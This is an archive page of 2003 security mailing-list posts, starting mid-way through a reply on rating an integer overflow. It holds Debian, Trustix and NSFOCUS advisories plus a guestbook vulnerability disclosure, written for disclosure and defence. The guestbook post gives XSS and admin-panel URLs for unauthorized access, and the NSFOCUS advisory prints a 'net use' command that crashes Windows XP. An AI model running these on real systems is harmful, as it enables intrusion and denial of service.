of 4 Gigabyte (on 32bit machines), then you have found a vulnerability.
Just stating that there is a possible integer overflow if someone 
allocates more than 2^32-7 bytes (2^64-7 bytes) is a joke. A vulnerability
that cannot be exploited may not be rated as: high risk. This can be
compared to calling strcpy a security vulnerability because it can be 
used by a stupid PHP core/extension programmer to produce a buffer overflow.

Stefan Esser


-- 

--
 Stefan Esser                 [EMAIL PROTECTED]
 e-matters Security           http://security.e-matters.de/

 GPG-Key                      gpg --keyserver pgp.mit.edu --recv-key 0xCF6CAE69 
 Key fingerprint              B418 B290 ACC0 C8E5 8292  8B72 D6B0 7704 CF6C AE69
--
 Did I help you? Consider a gift:http://wishlist.suspekt.org/
--



[SECURITY] [DSA 271-1] New ecartis and listar packages fix password change vulnerability

2003-03-27 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 271-1                   [EMAIL PROTECTED]
http://www.debian.org/security/                        Martin Schulze
March 27th, 2003                    http://www.debian.org/security/faq
- --

Package: ecartis, listar
Vulnerability  : unauthorized password change
Problem-Type   : remote
Debian-specific: no
CVE Id : CAN-2003-0162

A problem has been discovered in ecartis, a mailing list manager,
formerly known as listar.  This vulnerability enables an attacker to
reset the password of any user defined on the list server, including
the list admins.

For the stable distribution (woody) this problem has been fixed in
version 0.129a+1.0.0-snap20020514-1.1 of ecartis.

For the old stable distribution (potato) this problem has been fixed
in version 0.129a-2.potato3 of listar.

For the unstable distribution (sid) this problem has been
fixed in version 1.0.0+cvs.20030321-1 of ecartis.

We recommend that you upgrade your ecartis and listar packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 2.2 alias potato
- -

  Source archives:

http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3.dsc
  Size/MD5 checksum:  556 6a598c9cac5f1da997f3790b47711e33

http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3.diff.gz
  Size/MD5 checksum:82819 d8154d1316c73efa71907f026b5a5df4
http://security.debian.org/pool/updates/main/l/listar/listar_0.129a.orig.tar.gz
  Size/MD5 checksum:   323888 0302a199d9e5ee180c9e6e55ee7a0780

  Alpha architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_alpha.deb
  Size/MD5 checksum:   357788 7db5223f510d4d0d03cbf68e2d9a554c

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_alpha.deb
  Size/MD5 checksum:32072 5e63d71fa7a8cd8aed70821f529b5d13

  ARM architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_arm.deb
  Size/MD5 checksum:   335076 5b51113b57b948e9b2b73c06a835dde2

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_arm.deb
  Size/MD5 checksum:32174 1182335a3ce6c842aaef2832cd56db09

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_i386.deb
  Size/MD5 checksum:   301830 aa8d67d1f07cb0a769d2030708e3725c

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_i386.deb
  Size/MD5 checksum:25342 efd78841548a3e97b0d0557e8b360a3d

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_m68k.deb
  Size/MD5 checksum:   308188 fbacaef28d85db28a2d3d5e1e70945ce

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_m68k.deb
  Size/MD5 checksum:28030 2acf707d75e5f1e04cd297b5f1e33a3a

  PowerPC architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_powerpc.deb
  Size/MD5 checksum:   339304 4fb6eaa9bb7a3bc6f7598b6dd77a11b6

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_powerpc.deb
  Size/MD5 checksum:32094 ee010d55634c49190c6c31158474bc11

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/l/listar/listar_0.129a-2.potato3_sparc.deb
  Size/MD5 checksum:   343804 f43699c1036fbbacba2ee9f726796208

http://security.debian.org/pool/updates/main/l/listar/listar-cgi_0.129a-2.potato3_sparc.deb
  Size/MD5 checksum:31450 f0cd070c44790d8afdabd87a01aa3a9f


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/e/ecartis/ecartis_0.129a+1.0.0-snap20020514-1.1.dsc
  Size/MD5 checksum:  633 c12d84d29fc5f3a4d035abe9a4364d59

http://security.debian.org/pool/updates/main/e/ecartis/ecartis_0.129a+1.0.0-snap20020514-1.1.diff.gz
  Size/MD5 checksum:10058 a3a508ca141857099b5a2162ab960d2c

http://security.debian.org/pool/updates/main/e/ecartis/ecartis_0.129a+1.0.0-snap20020514.orig.tar.gz
  Size/MD5 checksum:   326215 2772a595a3fe7ea5073874113da813ec

  Alpha architecture:


http://security.debian.org/pool/updates/main

[SECURITY] [DSA 270-1] New Linux kernel packages (mips + mipsel) fix local root exploit

2003-03-27 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 270-1                   [EMAIL PROTECTED]
http://www.debian.org/security/                        Martin Schulze
March 27th, 2003                    http://www.debian.org/security/faq
- --

Packages   : kernel-patch-2.4.17-mips, kernel-patch-2.4.19-mips
Vulnerability  : local privilege escalation
Problem-Type   : local
Debian-specific: no
CVE Id : CAN-2003-0127

The kernel module loader in Linux 2.2 and Linux 2.4 kernels has a flaw
in ptrace.  This hole allows local users to obtain root privileges by
using ptrace to attach to a child process that is spawned by the
kernel.  Remote exploitation of this hole is not possible.

This advisory only covers kernel packages for the big and little endian MIPS
architectures.  Other architectures will be covered by separate advisories.

For the stable distribution (woody) this problem has been fixed in version
2.4.17-0.020226.2.woody1 of kernel-patch-2.4.17-mips (mips+mipsel) and in
version 2.4.19-0.020911.1.woody1 of kernel-patch-2.4.19-mips (mips only).

The old stable distribution (potato) is not affected by this problem
for these architectures since mips and mipsel were first released with
Debian GNU/Linux 3.0 (woody).

For the unstable distribution (sid) this problem has been fixed in
version 2.4.19-0.020911.6 of kernel-patch-2.4.19-mips (mips+mipsel).

We recommend that you upgrade your kernel-images packages immediately.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody1.dsc
  Size/MD5 checksum:  786 937c32a962c27f9461a10d4d2c98c350

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody1.tar.gz
  Size/MD5 checksum:  1140097 e26c4406aa52e77b00df972335fdbb71


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody1.dsc
  Size/MD5 checksum:  832 4e431992276bcd65d34bd07b86784200

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody1.tar.gz
  Size/MD5 checksum:  1035256 cd2e9213d798552a7ebc550903e45bf9

  Architecture independent components:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody1_all.deb
  Size/MD5 checksum:  1142510 b1c1c6d93281938651b91c0caa85b818


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody1_all.deb
  Size/MD5 checksum:  1036948 8de25b980c15831460c844a535b76e3a

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody1_mips.deb
  Size/MD5 checksum:  3494700 3ebb5ff6d044f808b500dfb0f5beccad

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-ip22_2.4.17-0.020226.2.woody1_mips.deb
  Size/MD5 checksum:  2038950 baae9c9e139d2b5ef035f01adea32171

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r5k-ip22_2.4.17-0.020226.2.woody1_mips.deb
  Size/MD5 checksum:  2039084 5bb6ad7c4207a6f351612fd4e330a337


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody1_mips.deb
  Size/MD5 checksum:  3897722 8d096cf0e9286e175127dfb1763bfcd2

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody1_mips.deb
  Size/MD5 checksum:  2072292 3f49ce11a63309465f1ee5c31b54a1c4

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody1_mips.deb
  Size/MD5 checksum:  2072926 b4ac7b3f74a392c4f7482eb590eadcb2

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody1_mips.deb
  Size/MD5 checksum:12418 ec83e5bf008c27285768faffcbbd8534

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/ke

TSLSA-2003-0013 - openssl

2003-03-27 Thread Trustix Secure Linux Advisor
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Trustix Secure Linux Security Advisory #2003-0013

Package name:  openssl
Summary:   Klima-Pokorny-Rosa
Date:  2003-03-26
Affected versions: TSL 1.1, 1.2, 1.5

- --
Package description:
  A C library that provides various cryptographic algorithms and protocols,
  including DES, RC4, RSA, and SSL. Includes shared libraries.

Problem description:
  The openssl-0.9.6-13tr package was open to the Klima-Pokorny-Rosa attack; this new
  one is patched against this problem.


Action:
  We recommend that all systems with this package installed be upgraded.


Location:
  All TSL updates are available from
  <http://www.trustix.net/pub/Trustix/updates/>
  <ftp://ftp.trustix.net/pub/Trustix/updates/>


About Trustix Secure Linux:
  Trustix Secure Linux is a small Linux distribution for servers. With focus
  on security and stability, the system is painlessly kept safe and up to
  date from day one using swup, the automated software updater.


Automatic updates:
  Users of the SWUP tool can enjoy having updates automatically
  installed using 'swup --upgrade'.

  Get SWUP from:
  <ftp://ftp.trustix.net/pub/Trustix/software/swup/>


Public testing:
  These packages have been available for public testing for some time.
  If you want to contribute by testing the various packages in the
  testing tree, please feel free to share your findings on the
  tsl-discuss mailing list.
  The testing tree is located at
  <http://www.trustix.net/pub/Trustix/testing/>
  <ftp://ftp.trustix.net/pub/Trustix/testing/>
  

Questions?
  Check out our mailing lists:
  <http://www.trustix.net/support/>


Verification:
  This advisory along with all TSL packages are signed with the TSL sign key.
  This key is available from:
  <http://www.trustix.net/TSL-GPG-KEY>

  The advisory itself is available from the errata pages at
  <http://www.trustix.net/errata/trustix-1.2/> and
  <http://www.trustix.net/errata/trustix-1.5/>
  or directly at
  <http://www.trustix.net/errata/misc/2003/TSL-2003-0013-openssl.asc.txt>


MD5sums of the packages:


Trustix Security Team



Vulnerability in my guest book

2003-03-27 Thread Over_G
Product: My guest book
Version: ?
OffSite: ?
Problem: CSS and unauthorized access in admin panel
--

1) Cross-site scripting

http://[target]/myguestBk/add1.asp?name=Name&subject=Subj&[EMAIL PROTECTED]&message=alert ("Test!")

Or open http://[target]/myguestBk/add.asp, write alert ("Test!") in the
"Message" field, and press "Post Message".


2) Unauthorized access to the admin panel

http://[target]/myguestBk/admin/index.asp
Delete news:
http://[target]/myguestBk/admin/delEnt.asp?id=NEWSNUMBER
where NEWSNUMBER is the news number in the database.




Contacts: www.overg.com www.dwcgr0up.com
irc.zaingandol.org #DWC
[EMAIL PROTECTED]


Best regards, Over G[DWC Gr0up]




NSFOCUS SA2003-01: Microsoft Windows XP Redirector Local Buffer Overflow Vulnerability

2003-03-27 Thread NSFOCUS Security Team

NSFOCUS Security Advisory(SA2003-01)

Topic: Microsoft Windows XP Redirector Local Buffer Overflow Vulnerability

Release Date: 2003-3-27

CVE CAN ID: CAN-2003-0004

Affected system:
================

- Microsoft Windows XP
- Microsoft Windows XP SP1

Summary:
========

NSFOCUS Security Team has found a buffer overflow vulnerability in the Microsoft
Windows XP Redirector. By exploiting the vulnerability, local attackers
could crash the system or gain local SYSTEM privileges using carefully crafted
code.

Description:
============

The Windows Redirector is used to access files, whether local or remote. It
is used to access network shares via the net use command.

A security vulnerability exists in the Windows Redirector on Windows XP. An
unchecked length in the handling of received parameter information causes a
buffer overflow vulnerability. By exploiting the vulnerability, a non-privileged
user could cause a system blue screen and reboot. With carefully crafted
code, attackers could execute arbitrary commands with SYSTEM privileges. At
present no remote exploitation method has been found.

Only Windows XP is vulnerable to the issue. Windows NT 4.0, Windows NT 4.0
Terminal Server Edition, and Windows 2000 do not contain the vulnerable code
and are not affected by this vulnerability.

Exploit:
========

Enter the following command as a non-privileged user in the command line
window:

c:\> net use \\...AAA[about 1000-2000 'A' characters]\A

Windows XP will blue screen or reboot immediately.

Note: Attackers have to be able to log in interactively.

Workaround:
===========

Prohibit untrusted users from logging in to your system.

Vendor Status:
==============

Microsoft has issued a Security Bulletin (MS03-005) and the related patch.

The detailed Microsoft Security Bulletin is available at:

http://www.microsoft.com/technet/security/bulletin/ms03-005.asp

Patches are available at:

- Microsoft Windows XP 32-bit Edition:
http://microsoft.com/downloads/details.aspx?FamilyId=33DABD1F-505E-48ED-B9BD-CDAC0F8A2BC1

- Microsoft Windows XP 64-bit Edition:
http://microsoft.com/downloads/details.aspx?FamilyId=A2258F4E-9A69-4537-9469-0DDEB4BB76F8

Additional Information:
=======================

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2003-0004 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security
problems. Candidates may change significantly before they become official
CVE entries.

DISCLAIMER:
===========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PERMITTED PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2003 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE  1B90 D7BF 7877 C6A6 F6DA